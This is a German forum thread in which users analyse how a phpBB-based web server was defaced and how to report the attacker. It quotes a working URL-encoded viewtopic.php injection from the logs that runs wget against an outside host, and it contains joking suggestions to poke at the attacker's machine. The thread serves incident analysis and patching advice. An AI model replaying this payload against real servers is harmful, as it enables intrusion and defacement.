|
Server gehacked
Ein Bekannter von mir wurde von Boxocide und ESX heimgesucht.
boxocide Er hat einen GNU/Linux Webserver laufen mit Apache 2.0.51 (php und mysql versionen sind mir zurzeit nicht bekannt) - basierend auf FC2. Nachdem ich mir die Logfiles angesehen hab bin ich mir nicht sicher, wie die reingekommen sind. Jedenfalls wurden im DocumentRoot der Hauptseite (phpBB basierend) die wichtigsten Files durch .html files ersetzt. Daneben laufen noch einige kleine Seiten, die durch Virtualhosts betrieben werden - welche jedoch alle durch .htaccess vom public-Zugriff abgeschirmt werden. Der Server wird sowieso komplett neu aufgesetzt, da meine Fähigkeiten nicht ausreichen, um wirklich alles zu checken. Einen Rootkit-Checker hab ich schon ausgeführt, der hat nichts Verdächtiges gefunden. Nach langer Sucherei in den Logfiles ist mir jedoch folgendes aufgefallen: (aus der access_log von Apache): Zitat:
Dann kommt das error_log: Zitat:
Und: Zitat:
Desweiteren scheint es, als ob group, shadow usw. in /etc auch geändert wurden, da es mit dem Änderungsdatum der index-Files im DocumentRoot übereinstimmt. Genaueres kann ich erst sagen, wenn ich den Serverbetreiber ausflaschel. Kann man mit diesen Angaben eine ungefähre Aussage tätigen, wie die da reingekommen sind ? Ist es möglich, über phpBB Schwachstellen shell access zu ergaunern ? Wie gesagt, der Server wird komplett neu aufgesetzt und ich habe weder das Wissen, noch das Interesse das komplette System forensisch zu untersuchen. Denn was ich finden werde (im Fall des Falles) bringt sowieso nix, da ich annehme, dass die so gscheit sind und ihre Spuren verwischt haben. Vielen Dank für Tips |
Läuft auch PHPNuke?
Sloter |
Zusatzfrage:
Soweit ich weiß bedeuten die %xx Angaben Strings - wie kann ich diese in Strings umwandeln sodaß ich genau sehe, was die für eine Syntax für viewtopic.php genutzt haben ? |
Zitat:
Edit: http://www.heise.de/security/news/meldung/53511 Hmmm. |
Gar nicht mal so alt.
http://www.heise.de/security/news/meldung/53511 PHPNuke auf einem anderen virtuellen Host? Sloter |
Zitat:
Alle anderen "Seiten" sind eher Admin-Tools, welche aber durch .htaccess abgesichert sind. Und ich habe nirgends in den Logs einen Zugriff auf diese Seiten gesehen. Ich gehe davon aus, dass ein Zugriff über phpBB statt gefunden hat. |
Re: Server gehacked
Zitat:
rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77 %67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7 3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63% 6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45 %4E%44%5F Übersetzt man das mittels urldecode(), kommt folgendes zum Vorschein: |
Hmmm,
also bedeuted das, dass besagte wget Aufrufe durch Mißbrauch der viewtopic.php stattgefunden haben ? Also in Wahrheit nie shell access ergaunert wurde, sondern alle Befehle mittels viewtopic.php ausgeführt wurden ? Alle besagten bösen viewtopic.php Gebräuche in der haha.txt. Edit: Hier ein paar "übersetzte" Befehle: Zitat:
Najo, sei Schuld. Und noch was gefunden: Zitat:
Zusatzfrage: Die IPs sind natürlich gespeichert, eine ist klar zuordnungsbar, zwar eine dynamische IP aus Dallas, dennoch kein anon-proxy. Spoofing sollte nicht möglich sein, da auf dem GNU/Linux server auch eine iptables firewall gelaufen ist. Tjo, ich schätz mal dies als Musterbeispiel geltend zu machen, was passiert, wenn man ein Script benutzt, das fehleranfällig ist und vorallem, nicht upzudaten und deppat root details zu nutzen, um mysql auszuführen. Irgend eine Chance, mit den IPs den Verursachern zumindest auf die Finger zu klopfen ? |
Zitat:
Zitat:
Ich würde allen die phpBB einsetzen dringend raten auf phpBB 2.0.11 zu upgraden. |
Ich denke es wäre trotzdem ratsam, den Server komplett neu aufzusetzen?
Und diesmal mach ich es, dass nix mehr rooterei passiert :D |
Zitat:
Ganz anders wäre es wenn jemand echten root Zugang erlangt. Zitat:
Zitat:
|
Zitat:
Das kann ich erst nach Rücksprache mit dem Serverholder machen - keine Ahnung was der da in letzter Zeit aufgeführt hat. Zitat:
Tipp, wie ich das bewerkstelligen sollte? In der bash_history find ich nix. Zitat:
Leute editen gern .ini und /etc files :lol: Zitat:
Aber dennoch, was wäre in so einer Mail einzufügen, um wirklich etwas in der Hand zu haben? Leider erscheint eine IP dynamisch zu sein, von der anderen kann ich (noch) nix sagen. Also Datum+Uhrzeit der Tätigkeiten plus copy&paste der Logs ? Thx Edit: Und darüberhinaus, waren das überhaupt Profis? Weil so deppert sein und solche Spuren hinterlassen :S |
Zitat:
Zitat:
Ist 69.93.x.xxx der IP Bereich des Angreifers? Dieser IP Bereich gehört zu www.theplanet.com bzw. www.servermatrix.com. Der Angriff wurde in diesen Fall von einen Dedizierten Server ausgeführt der möglicherweise auch gehackt wurde. Ich würde auf jedenfall eine Email an abuse@theplanet.com schicken, da The Planet diese Emails tatsächlich liest. Zitat:
Ein cat access.log | grep rush sollte übrigens alle viewtopic.php Hackversuche zeigen. |
thx für deine Hilfe phillip.
Ich hab die IP Range schon ausfindig gemacht, kontaktiere aber zurzeit andere Betroffene, sodaß wir das Abuse Senden koordinieren, dass der Provider dies nun wirklich ernst nimmt. Alle relevanten log Einträge hab ich schon mit grep gefiltert. BTw: hab es jetzt lokal probiert mit phpBB 2.0.7 ---> es ist unglaublich einfach :S Also bitte alle auf 2.0.11 upgraden ! Update: Es scheint als ob der Angriff von einem gehackten dedicated Gameserver gestartet wurde. uffff. |
Bei The Planet werden solche Meldungen normalerweise gleich ernst genommen und untersucht. Diese Server werden dann meistens vom Netz genommen und der Betreiber muss einen Serverrestore für $75 machen bevor der entsprechende Server wieder angeschlossen wird.
|
Ich finde leider die Mails nicht mehr.
Aber vor 3-5 Monate hat ein Server von ThePlanet eine mir bekannte Maschine attackiert und ThePlanet hat es nicht die Bohne interressiert. Wenn du dich auf der Maschine vom Angreifer umsiehst, findest du ein verzeichnis mit allmöglichen Hackertools und Scripten die Exploits ausnützen. Vielleicht sollte man ThePlanet in arabisch anschreiben, das sie reagieren :D Sloter |
dann borgst mir aber deine mail addy :D
|
Zitat:
jösses, jösses ... guter anfang honey ;-) artemisia (sry, wegen ot) |
Zitat:
|
Nö, Server wurde nicht vom Netz genommen.
Leider finde ich die Mails nicht mehr, Imho war es sogar die selbe Maschine. Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software. @dumdideldum Feigling, es genügen ein paar Wörter. Ahmed dankt ServerPlanet für die Unterstützung im Kampf gegen den Imperialismus :D Sloter |
Zitat:
Wenn ja, her mit den Verzeichnissen. Ein Ratespiel ist schon heftig. Zitat:
|
endlich mal ein sehr interessanter thread :)
btw: wenn der angreifer schon seine tools anbietet, so nutze sie doch :hehe: |
@frazzz
Die Tools und Scripten findest du leicht im Netz. @dumdideldum Ich kann dir keine Anleitung geben, das wäre nicht legal ;-) Du hast doch einen wget in deinen Logs. Laß das wget weg und gib das ganze in den Browser ein, ohne abschließenden Dateiangabe. http://www.domain.com/verzeichnis/ Sloter |
Zitat:
Zitat:
|
@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm ;) Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren. Sieht viel mehr nach l33t h4xx0r aus :D Zitat:
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren: 1) pico shk2.html Seit wann ist es möglich, pico über einen Browser zu bedienen ? 2) cp boxoesx.gif /images Hamma vergessen dass man nicht im / ist? |
Zitat:
der srv, dessen ip du in deinen logs findest :rolleyes: denk ich auch, das es kiddies waren. ernstzunehmen, ja. immerhin konnten sie eindringen, also passt was nicht. |
Zitat:
Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver. Insofern bringt mir http Nüsse. |
Zitat:
ist doch egal, wozu der server dient(e) du findest ein verzeichnis mit der hackersoftware ;) Zitat:
|
Zitat:
Das dort monatelang der gleiche Server als Hackmachine verwendet wird, kann ich mir irgendwie nicht vorstellen. Ich kenne The Planet wirklich sehr sehr gut... ;) http://uptime.netcraft.com/up/graph?...majorgeeks.com http://uptime.netcraft.com/up/graph?...majorgeeks.com http://uptime.netcraft.com/up/graph?...majorgeeks.com Der zweite Total Control Server wird in Kürze bestellt und ersetzt meine derzeitige Dual Xeon Machine bei EV1/Rackshack :) |
Ich guck Morgen nocheinmal nach in meinem Mailarchiv.
Ich kann mich nur auf die Domain erinnern willysbirthday.com. Ich kann mir aber schon vorstellen das es die Burschen von ThePlanet nicht sonderlich interressiert. Das anbieten von Tools und Scripten ist nichts verwerfliches und wo bitte soll Österreich sein? Wir werden ja sehen, wie lange die Maschine von der Dumdideldum angegriffen wurde, online ist. Bis jetzt schaut es nicht danach aus, als würde sie offline gehen. Sloter |
Zitat:
http://uptime.netcraft.com/up/graph?...ysbirthday.com Zitat:
http://forums.servermatrix.com/viewt...10957&start=54 Das gleiche übrigens auch bei http://www.ev1servers.net. |
Ein Brutforce ist auch etwas anderes, als ein Download von ein paar Scripten zum Testen ob der eigene Server dicht ist.
Obwohl nach der letzten Rechtsprechung in D, ist ein Brutforce keine Straftat. Man kann sich ja einmal bei der IP verhauen, eigentlich wollte man am eigenen Server sich einlogen. So wie ich die Amis kenne, werden sie einem eigenen Patrioten nur etwas tun, wenn die Beschwerde auch von einem Ami kommt. Ansonst, wo ist eigentlich Österreich. Sloter |
Zitat:
Zitat:
|
ein brutforce dient imho zu erlangung eines root(su, admin)-pwd, also ist der login bekannt oder zum hacken einer verschlüsselung.
=> rc5 afaik auch ein bruteforce |
Zitat:
Das jemand auf einen öffentlichen Service zugeriffen hat. Wenn das nicht erwünscht ist, das jemand von Aussen zugreift, warum wird dann der Dienst frei gegeben? 2, Yep, wenn sich ein Ami beschwert. 3, Ich auch, aber das ich mir die tägliche Arbeit ersparre, verwende ich ein Script zum einlogen. Ich kann jetzt gar nicht erklären, warum das Script irre gelaufen ist, ich wollte mich nur auf meinem Server einlogen. Apropo, der Server ist noch immer online und ich verwette eine kostenlose .info das er online bleibt ;-) Sloter |
Zitat:
69.93.x.xxx - - [02/Dec/2004:02:48:04 +0100] "GET /viewtopic.php?t=%32%30& rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77 %67%65%74%20%68%74%74%70%3A%2F%2F%77%69%6C%6C%79%7 3%62%69%72%74%68%64%61%79%2E%63%6F%6D%2F%68%61%63% 6B%65%64%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45 %4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75 %28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%7 2%75%73%68%5D%29.%2527 HTTP/1.1" 200 6025 "-" "-" Diese Anfrage wurde mittels eines im Umlauf befindlichen Perl Scripts generiert, welches es erlaubt beliebige Shell Befehle über phpBB 2 auszuführen. Zitat:
Zitat:
Zitat:
Hat Dumdideldum den Server überhaupt gemeldet? Je nach Situation kann es auch durchaus sein das er online bleibt. Möglichkeit #1 Der Server selber wurde kompromitiert In diesen Fall wird er vom Netz genommen und muss neu installiert werden. Ein Reimage der Platte kostet $75 und einige Stunden Downtime. Sobald der Server clean ist wird er wieder angeschlossen. Möglichkeit #2 Der Kunde einer Webhostingfirma die diesen Server gemietet hat spielt Script Kiddy oder Spammer In diesen Fall bekommt der Serverbetreiber ein Trouble Ticket von der Abuse Abteilung das er innerhalb 24 Stunden beantworten sollte. Wenn er koopieriert, wird beim ersten Mal noch ein Auge zugedrückt. |
Zitat:
Welche PHP Version/OS verwendest Du auf deiner lokalen Installation? |
Zitat:
|
Zitat:
MySQL 4.0.22 Apache 2.0.52 Debian SID Abuse Mail gesendet, damit ist das Problem für mich erledigt. |
falls noch interesse besteht
der bug wird hier beschrieben, zumindestens hört es sich genau nach deinem prob an. och, steht doch schon alles auf der ersten seite :D, wieder mal zu langsam ;) |
| Alle Zeitangaben in WEZ +2. Es ist jetzt 01:20 Uhr. |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© 2009 FSL Verlag